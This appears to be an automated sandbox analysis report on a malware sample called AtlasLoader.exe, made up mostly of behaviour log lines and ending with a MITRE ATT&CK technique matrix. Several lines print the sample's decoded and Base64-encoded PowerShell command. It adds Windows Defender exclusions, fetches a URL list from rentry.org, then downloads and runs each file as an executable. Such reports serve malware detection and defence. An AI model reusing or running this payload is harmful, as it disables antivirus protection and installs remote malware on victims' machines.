Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8374Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5880Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000001.00000003.461493971.0000000005062000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: AtlasLoader.exe, 00000000.00000002.359103034.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: powershell.exe, 00000001.00000003.461493971.0000000005062000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\AtlasLoader.exeCode function: 0_2_00401159 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,0_2_00401159

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: Base64 decoded <#cwk#> Add-MpPreference <#tyk#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hvz#> -Force <#bvh#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/rc5se/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#ueu#> (Join-Path <#blz#> -Path $env:Temp <#bxc#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#hcv#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#vis#> (Join-Path -Path $env:Temp <#lhm#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#vii#>
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: Base64 decoded <#cwk#> Add-MpPreference <#tyk#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hvz#> -Force <#bvh#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/rc5se/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#ueu#> (Join-Path <#blz#> -Path $env:Temp <#bxc#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#hcv#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#vis#> (Join-Path -Path $env:Temp <#lhm#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#vii#>Jump to behavior
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagmadwbracmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmadab5agsaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmaaab2ahoaiwa+acaalqbgag8acgbjaguaiaa8acmaygb2aggaiwa+adsajab3agmaiaa9acaakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackaowakagwabgbracaapqagacqadwbjac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavahiaywa1ahmazqavahiayqb3accakqauafmacabsagkadaaoafsacwb0ahiaaqbuagcawwbdaf0aigbgahiayabuacialaagafsauwb0ahiaaqbuagcauwbwagwaaqb0ae8acab0agkabwbuahmaxqa6adoatgbvag4azqapadsaiaakagyabgagad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabsageabgbkag8abqbgagkabablae4ayqbtaguakaapadsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiaakahcaywauaeqabwb3ag4ababvageazabgagkabablacgajabsag4aawbbacqaaqbdacwaiaa8acmadqblahuaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwbiagwaegajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbiahgaywajad4aiaataemaaabpagwazabqageadaboacaakaakagyabgagacsaiaakagkalgbuag8auwb0ahiaaqbuagcakaapacaakwagaccalgblahgazqanackakqapacaafqa8acmaaabjahyaiwa+adsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmadgbpahmaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbuaguabqbwacaapaajagwaaabtacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapacaafqagadwaiwb2agkaaqajad4a
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagmadwbracmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmadab5agsaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmaaab2ahoaiwa+acaalqbgag8acgbjaguaiaa8acmaygb2aggaiwa+adsajab3agmaiaa9acaakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackaowakagwabgbracaapqagacqadwbjac4arabvahcabgbsag8ayqbkafmadabyagkabgbnacgajwboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavahiaywa1ahmazqavahiayqb3accakqauafmacabsagkadaaoafsacwb0ahiaaqbuagcawwbdaf0aigbgahiayabuacialaagafsauwb0ahiaaqbuagcauwbwagwaaqb0ae8acab0agkabwbuahmaxqa6adoatgbvag4azqapadsaiaakagyabgagad0aiabbafmaeqbzahqazqbtac4asqbpac4auabhahqaaabdadoaogbhaguadabsageabgbkag8abqbgagkabablae4ayqbtaguakaapadsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiaakahcaywauaeqabwb3ag4ababvageazabgagkabablacgajabsag4aawbbacqaaqbdacwaiaa8acmadqblahuaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwbiagwaegajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbiahgaywajad4aiaataemaaabpagwazabqageadaboacaakaakagyabgagacsaiaakagkalgbuag8auwb0ahiaaqbuagcakaapacaakwagaccalgblahgazqanackakqapacaafqa8acmaaabjahyaiwa+adsaiabmag8acgagacgajabpad0amaa7acaajabpacaalqbsahqaiaakagwabgbrac4atablag4azwb0aggaowagacqaaqaracsakqagahsaiabtahqayqbyahqalqbqahiabwbjaguacwbzacaalqbgagkabablafaayqb0aggaiaa8acmadgbpahmaiwa+acaakabkag8aaqbuac0auabhahqaaaagac0auabhahqaaaagacqazqbuahyaogbuaguabqbwacaapaajagwaaabtacmapgagac0aqwboagkababkafaayqb0aggaiaaoacqazgbuacaakwagacqaaqauafqabwbtahqacgbpag4azwaoackaiaaracaajwauaguaeablaccakqapacaafqagadwaiwb2agkaaqajad4aJump to behavior
Source: C:\Users\user\Desktop\AtlasLoader.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB5AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaAB2AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB2AGgAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHIAYwA1AHMAZQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAdQBlAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBiAHgAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAaABjAHYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBpAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAaABtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AGkAaQAjAD4AJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter		Path Interception11
Process Injection		1
Masquerading		1
Input Capture		1
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
PowerShell		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
